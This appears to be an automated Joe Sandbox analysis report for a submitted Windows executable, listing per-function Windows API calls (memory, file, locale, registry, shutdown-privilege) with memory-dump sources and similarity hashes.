                                                              • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                              • Instruction Fuzzy Hash:
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                              • Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
                                                              • Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                              • Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                              • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                              • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                              • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                              APIs
                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: FreeVirtual
                                                              • String ID:
                                                              • API String ID: 1263568516-0
                                                              • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                              • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                              • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                              • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                              • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                              • String ID: SeShutdownPrivilege
                                                              • API String ID: 107509674-3733053543
                                                              • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                              • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                              • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                              • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                              APIs
                                                              • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                              • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                              • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                              • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID:
                                                              • API String ID: 3473537107-0
                                                              • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                              • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                              • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                              • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
                                                              APIs
                                                              • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale
                                                              • String ID:
                                                              • API String ID: 2299586839-0
                                                              • Opcode ID: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                              • Instruction ID: 297a7c39c0825e6b478cba46507f56ab37b47465b1590baa0f4eee863dd3b982
                                                              • Opcode Fuzzy Hash: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                              • Instruction Fuzzy Hash: AED05EA630E6502AE21051AB2D85EBB4A9CCEC5BA4F18407FF648D7242D6248C069B76
                                                              APIs
                                                              • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: SystemTime
                                                              • String ID:
                                                              • API String ID: 2656138-0
                                                              • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                              • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                              • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                              • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                              APIs
                                                              • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Version
                                                              • String ID:
                                                              • API String ID: 1889659487-0
                                                              • Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                              • Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
                                                              • Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                              • Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                              • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                              • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                              • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                              • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressCloseHandleModuleProc
                                                              • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                              • API String ID: 4190037839-2401316094
                                                              • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                              • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                              • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                              • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                              APIs
                                                              • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                              • LocalFree.KERNEL32(004EFAE8,00000000,00401AB4), ref: 00401A1B
                                                              • VirtualFree.KERNEL32(?,00000000,00008000,004EFAE8,00000000,00401AB4), ref: 00401A3A
                                                              • LocalFree.KERNEL32(004EDD30,?,00000000,00008000,004EFAE8,00000000,00401AB4), ref: 00401A79
                                                              • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                              • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                              • String ID: $N$TN$dN
                                                              • API String ID: 3782394904-3669176175
                                                              • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                              • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                              • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                              • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                              • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                              • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                              • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                              • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                              • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                              • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                              • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                              • String ID:
                                                              • API String ID: 1694776339-0
                                                              • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                              • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                              • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                              • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                              APIs
                                                              • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                              • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                              • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                              • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                              • String ID: $N$TN$dN
                                                              • API String ID: 730355536-3669176175
                                                              • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                              • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                              • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                              • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                              APIs
                                                              • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                                • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: InfoLocale$DefaultSystem
                                                              • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                              • API String ID: 1044490935-665933166
                                                              • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                              • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                              • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                              • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
                                                              APIs
                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                              • ExitProcess.KERNEL32 ref: 00403DE5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ExitMessageProcess
                                                              • String ID: Error$Runtime error at 00000000$9@
                                                              • API String ID: 1220098344-1503883590
                                                              • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                              • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                              • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                              • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                              • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                              • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocString
                                                              • String ID:
                                                              • API String ID: 262959230-0
                                                              • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                              • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                              • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                              • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,TN,?,?,?,00401800), ref: 004014B2
                                                              • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,TN,?,?,?,00401800), ref: 004014D7
                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,TN,?,?,?,00401800), ref: 004014FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Virtual$Alloc$Free
                                                              • String ID: TN$dN
                                                              • API String ID: 3668210933-3683469604
                                                              • Opcode ID: 53fb4fb4dead2bf9bf87b2a1222c08a4795459efffcdd9b971e00269c0061a0c
                                                              • Instruction ID: d5dc587d839e3be782c9b7b9e1ff5a952950f17ebcccd457e3de013d7af40e21
                                                              • Opcode Fuzzy Hash: 53fb4fb4dead2bf9bf87b2a1222c08a4795459efffcdd9b971e00269c0061a0c
                                                              • Instruction Fuzzy Hash: 7CF0C8717403106AEB316E694CC5F533AD89F85754F1040BAFA0DFF3DAD6745800826C
                                                              APIs
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: QueryValue
                                                              • String ID: )q@
                                                              • API String ID: 3660427363-2284170586
                                                              • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                              • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                              • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                              • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                              • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2964307113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2964271987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964333645.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2964355582.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CommandHandleLineModule
                                                              • String ID: U1hd.@
                                                              • API String ID: 2123368496-2904493091
